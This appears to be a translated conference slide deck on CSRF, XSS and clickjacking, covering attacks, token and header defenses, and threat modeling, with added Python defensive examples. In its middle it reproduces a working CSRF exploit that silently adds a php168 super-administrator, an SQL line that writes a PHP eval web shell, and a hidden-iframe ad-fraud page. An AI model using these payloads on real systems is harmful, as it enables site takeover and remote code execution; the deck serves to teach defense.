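TAIS Taiwan Academic Information Security International Conference
Analysis and Mitigation of CSRF (Cross-Site Request Forgery) Attacks
Cross-Site Request Forgery Threat and Mitigation
夏克強, Senior Technical Consultant, 麟瑞科技
CISSP, CHFI, CEH
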
Why Web Applications Are Vulnerable
Improved commercial or in-house application access to information means improved access for hackers?
[Diagram: Web Servers, Application Servers and Database Servers, each on its own Operating System, on top of the Network (network, firewall, IDS, IPS)]
75% of attacks are concentrated here:
• Web applications (Web AP)
• Those not yet live are rushed into production
• Those already live are many years old
Attacks: SQL Injection, Parameter Tampering, XSS, etc.
Database Servers hold: Customer Info, Business Data, Transaction Info (personal data, transaction records, customer data)

OWASP TOP TEN
Mapping from 2007 to 2010 Top 10 [mapping table]

Cybercrime Threats
Cyber pickpocketing: BEBLOH, where the malware went beyond “traditional” keylogging by not only stealing credit card information but also accessing the account and transferring funds to another account

Cross-Site Scripting
• Reflected XSS, Stored XSS (aka Persistent XSS)
• Samy Worm
• Web sites compromised: FBI.gov, CNN.com, Time.com, Ebay, Yahoo, Apple computer, Microsoft, Zdnet, Wired, and Newsbytes
• Top vulnerable weakness in recent years
• Web sites vulnerable to XSS: search pages, forums, comments, login pages...
Cross-Site Scripting attacks
• Hoax
• Steal the user’s session ID and cookies
• Almost full control of your browser, such as port scanning, keylogging and sending requests on behalf of the client

Stored Cross-Site Scripting
1. Attacker sets the trap: update my profile. Attacker enters a malicious script into a web page that stores the data on the server (application with stored XSS vulnerability).
2. Victim views page: sees attacker profile. Script runs inside victim’s browser with full access to the DOM and cookies.
3. Script silently sends attacker Victim’s session cookie.
[Diagram: Custom Code over the application's business functions: Accounts, Finance, Administration, Transactions, Communication, Knowledge Mgmt, E-Commerce, Bus. Functions]

Stored & Reflected XSS
Stored XSS (aka Persistent XSS) is more serious than reflected XSS
• Reflected XSS must use some means of inducing users to visit the attacker’s crafted URL
• A phishing attack that offers a link to his own malicious web server would be suspected as a scam
• For stored XSS this requirement is avoided
• Stored XSS guarantees that victim users will already be accessing the application at the time that the attack strikes
• Reflected XSS may try to engineer this situation by persuading the user to log in

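Clickjacking
• In clickjacking, the attacker tries to hijack the user's mouse clicks, so that the user unknowingly clicks a link or button the attacker has carefully crafted
• Clickjacking can be regarded as an advanced phishing technique
• Clickjacking (Session-Riding) is similar to CSRF: both trick the user without the user being aware of it
• Combining clickjacking with CSRF multiplies the effect of the attack
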
Clickjacking Defenses
• Use the ClearClick feature of NoScript for Firefox
• Block iframe execution (NoScript) or disable JavaScript
• Frame busting (that is, anti-framing) for your own sites:
  <script>if (top != self) top.location = location</script>
• IE8 adds defenses against clickjacking attacks:
  X-FRAME-OPTIONS: DENY
  X-FRAME-OPTIONS: SAMEORIGIN

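One way to send the X-FRAME-OPTIONS header listed above from your own site, written as a Python WSGI middleware. This is an added example, not code from the slides; `frame_guard`, `call` and the two sample apps are hypothetical names constructed for illustration.

```python
def frame_guard(app, policy="SAMEORIGIN"):
    """WSGI middleware: add X-Frame-Options unless the app already set one."""
    if policy not in ("DENY", "SAMEORIGIN"):
        raise ValueError("policy must be DENY or SAMEORIGIN")

    def wrapped(environ, start_response):
        def guarded_start(status, headers, exc_info=None):
            names = {name.lower() for name, _ in headers}
            if "x-frame-options" not in names:
                # Keep an app-supplied value; only fill in the missing header.
                headers = list(headers) + [("X-Frame-Options", policy)]
            return start_response(status, headers, exc_info)
        return app(environ, guarded_start)
    return wrapped


def call(app, path="/"):
    """Run a WSGI app once and return its response headers (lower-cased names)."""
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured.update({name.lower(): value for name, value in headers})

    list(app({"REQUEST_METHOD": "GET", "PATH_INFO": path}, start_response))
    return captured


def profile_app(environ, start_response):
    """Constructed sample app that sets no framing header itself."""
    start_response("200 OK", [("Content-Type", "text/html")])
    return [b"<form>profile</form>"]


def transfer_app(environ, start_response):
    """Constructed sample app that already forbids all framing."""
    start_response("200 OK", [("Content-Type", "text/html"),
                              ("X-Frame-Options", "DENY")])
    return [b"<form>transfer</form>"]


if __name__ == "__main__":
    print(call(profile_app))                # no framing header: frameable
    print(call(frame_guard(profile_app)))   # SAMEORIGIN added by the middleware
    print(call(frame_guard(transfer_app)))  # the app's own DENY is kept
```
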
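Forced Browsing
• Use: advertising revenue
• Technique: thousands of people click, from different IP addresses, which can evade checking mechanisms
<html>
<body>
空白頁 <!-- "blank page" -->
<iframe src="http://www.google.com.tw/search?hl=zh-TW&q=taiwan+taipei" height="0" width="0"></iframe>
</body>
</html>
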
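CSRF example: going a step further, luring you to click a link
Suppose the shopping site you visit is at http://www.hacker.net and you buy a product there. The shopping site's request is:
http://www.hacker.net/buy.php?item=computer&quantity=1
This is a normal HTTP request: the item name is computer and the quantity is 1. The site records the purchased item and quantity in the user's account.
If an attacker knows how the http://www.hacker.net shopping site works, he can forge a similar HTTP request:
http://www.hacker.net/buy.php?item=computer&quantity=1000
Here the item name is computer, but the quantity is 1000. If the target user accidentally visits this link while logged in to the site, a record of a purchase of 1000 computers will appear in his account.
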
CSRF attack on php168 (excerpted from www.haik8.com)
The page for adding a site administrator is:
<!-- Note: the form carries no per-session token field -->
<form name="form1" method="post" action="index.php?lfj=member&action=addmember">
  <tr class="head">
    <td colspan="2">添加新用户</td> <!-- "Add new user" -->
  </tr>
  <tr bgcolor="#FFFFFF">
    <td width="37%">帐号:</td> <!-- account name -->
    <td width="63%"> <input type="text" name="postdb[username]"> </td>
  </tr>
  <tr bgcolor="#FFFFFF">
    <td width="37%">密码:</td> <!-- password -->
    <td width="63%"> <input type="password" name="postdb[passwd]"> </td>
  </tr>
  <tr bgcolor="#FFFFFF">
    <td width="37%">重复密码:</td> <!-- repeat password -->
    <td width="63%"> <input type="password" name="postdb[passwd2]"> </td>
  </tr>
  <tr bgcolor="#FFFFFF">
    <!-- User group. Help text: only the super administrator and the creator can add
         new super administrators; only the super administrator, the founder and
         front-end administrators can add new front-end administrators -->
    <td width="37%">所属用户组:<span help=1>只有超级管理员与创建人才能添加新的超级管理员,只有超级管理员与创始人及前台管理员才能添加新的前台管理员</span></td>
    <td width="63%">
      <select name='postdb[groupid]' >
        <option value='' selected>现有用户组</option> <!-- existing user groups -->
        <option value='2' >游客组</option> <!-- guests -->
        <option value='3' >超级管理员</option> <!-- super administrator -->
        <option value='4' >前台管理员</option> <!-- front-end administrator -->
        <option value=''>--+以上是系统组,以下是会员组+--</option> <!-- system groups above, member groups below -->
        <option value='8' >普通会员</option> <!-- ordinary member -->
        <option value='9' >高级会员</option> <!-- senior member -->
      </select>
    </td>
  </tr>
  <tr bgcolor="#FFFFFF">
    <td width="37%">邮箱:</td> <!-- e-mail -->
    <td width="63%"> <input type="text" name="postdb[email]"> </td>
  </tr>
  <tr bgcolor="#FFFFFF">
    <td width="37%"> </td>
    <td width="63%"> <input type="submit" name="Submit" value="提交"> </td> <!-- submit -->
  </tr>
</form>

The attacker modifies the code. The modified code is as follows:
<html>
<body onload="document.form1.submit()">
<form name="form1" method="post" action="">
  <input type="hidden" name="postdb[username]" value='樱花浪子'>
  <input type="hidden" name="postdb[passwd]" value='nohack'>
  <input type="hidden" name="postdb[passwd2]" value='nohack'>
  <select name='postdb[groupid]' ><option value='3' selected></option></select>
</form>
</body>
</html>

This gives us the path: […]. When an administrator visits this page while logged in to the front end or back end, a super administrator with the user name “櫻花浪子” and the password “nohack” is added.

But doing it this way displays the "administrator added successfully" message. We want to be more hidden, so we make an image trojan:
<html>
<body>
<iframe src="" width=0 height=0></iframe>
<img src=/Article/UploadPic/2010-4/2010417144022600.jpg></img>
</body>
</html>
The resulting path is special/5_20090426220451_PYwLh.jpg

Execute: “SELECT ‘<?php @eval($_POST[cmd]);?>’ into outfile ‘C:\\AppServ\\www\\php168\\nohack.php’”

A check shows that it has been injected!!

Calendar system example
http://egw.ringline.com.tw/index.php?menuaction=calendar.calendar_uiviews.day&date=20110308

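CSRF, Referrer and X Headers example
<a href="http://egw.ringline.com.tw/index.php?menuaction=calendar.calendar_uiviews.day&date=20101016">請點我可打折</a>
(The link text reads "Click me for a discount".)
• Clickjacking and CSRF have a multiplying effect
• Use an iframe with Opacity=30
• Force the victim to load a specific date in the calendar

Countermeasures against CSRF
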
CSRF Preventions
• Insert custom random tokens into every form and URL
• Store a single token in the session and add it to all forms and links
  Hidden Field: <input name="token" value="687965fdfaew87agrde" type="hidden"/>
  Single use URL: /accounts/687965fdfaew87agrde
  Form Token: /accounts?auth=687965fdfaew87agrde …
• For sensitive data or value transactions, re-authenticate or use transaction signing
• Verify Referrer header, but XHR can break it.
• Verify X-header. It is more effective than Referrer header due to SOP.
  Legal example:
    GET /auth/update_profile.cgi?email=victim@social.site HTTP/1.1
    Host: social.site
    X-CSRF: 1
  Illegal example:
    <html><img src=http://social.site/auth/update_profile.cgi?email=attacker@evil.site></html>
    GET /auth/update_profile.cgi?email=attacker@evil.site HTTP/1.1
    Host: social.site
• Ensure that there are no XSS vulnerabilities in your application

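The session token and X-header checks listed above, applied to requests like the forged buy.php and update_profile.cgi ones shown earlier. This is an added example, not code from the original slides; the function names, the session dictionary and the sample requests are assumptions constructed for illustration.

```python
import hmac
import secrets

def issue_token(session):
    """Create the per-session token once and reuse it for every form and link."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]

def hidden_field(session):
    """Hidden form field carrying the session token, in the slide's format."""
    return '<input name="token" value="%s" type="hidden"/>' % issue_token(session)

def token_ok(session, params):
    """Constant-time comparison of the submitted token with the session copy."""
    expected, supplied = session.get("csrf_token"), params.get("token")
    if not expected or not supplied:
        return False
    return hmac.compare_digest(expected.encode(), supplied.encode())

def x_header_ok(headers):
    """A cross-site form or <img> request cannot attach a custom header."""
    lowered = {name.lower(): value for name, value in headers.items()}
    return lowered.get("x-csrf") == "1"

def authorize(session, headers, params):
    """Allow a state-changing request only with a valid token or the X-header."""
    if token_ok(session, params):
        return "allow: token"
    if x_header_ok(headers):
        return "allow: x-header"
    return "deny"

# Constructed requests (headers, parameters) against one logged-in session.
session = {"user": "victim"}
good_token = issue_token(session)
REQUESTS = {
    "own form": ({"Host": "social.site"}, {"email": "victim@social.site", "token": good_token}),
    "forged form or img": ({"Host": "social.site"}, {"email": "attacker@evil.site"}),
    "guessed token": ({"Host": "social.site"}, {"email": "attacker@evil.site", "token": "687965fdfaew87agrde"}),
    "XHR with X-CSRF": ({"Host": "social.site", "X-CSRF": "1"}, {"email": "victim@social.site"}),
}

def run():
    """Verdict for each constructed request."""
    return {name: authorize(session, h, p) for name, (h, p) in REQUESTS.items()}

if __name__ == "__main__":
    print(run())
```
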
Ratproxy
• Semi-automatic web application security assessment tool for XSS, CSRF
• Not all of the issues reported necessarily correspond to actual security flaws
• Findings should be validated by manual testing and analysis where appropriate

Microsoft Threat Modeling
Threats (STRIDE):
  S  Spoofing identity
  T  Tampering with data (integrity)
  R  Repudiability
  I  Information disclosure
  D  Denial of service
  E  Elevation of privilege
Rating (DREAD):
  D  Damage potential
  R  Reproducibility
  E  Exploitability
  A  Affected users
  D  Discoverability

Microsoft Threat Modeling
1. Identify assets
2. Create an architecture overview
3. Decompose the application
4. Identify the threats
5. Document the threats
6. Rate the threats

Obstacle for Code Review (or Scanners)
1. • Can’t provide immediate protection
   • Web applications change frequently. In many cases the application can change before a full review cycle has been completed
2. • The source code is not readily “available” or “understood”
   • With enough MIS staff and time to do re-coding?
3. • Manual code fixes are only as good as the developer
4. • Attacks (again, especially Web attacks) also change frequently.
   • No multiple services correlation capability
5. • Can’t track the accurate user who launches the attacks and the attack patterns

Continued
6. • Suitable for developing phase, not for production phase
   • Suitable for developing phase, not for design phase (only resolved by Risk Analysis)
7. • Slow response to compliance requirements
8. • Can’t protect web servers and backend database servers
9. • No web site cloaking such as anti Google hack
10. • Can’t provide additional insight into those that are requiring writing to the database or are accessed by transaction only

Obstacle for WAFs
1. • Suitable for production phase, not for developing phase
2. • Suitable for developing phase, not for design phase (only resolved by Risk Analysis)
3. • Lack of Logical flaws detection (only resolved by human code review)
   • Applications do something insecure
4. • Can’t accurately correct application flaws
5. • WAF could go down (fail-open or fail-close)
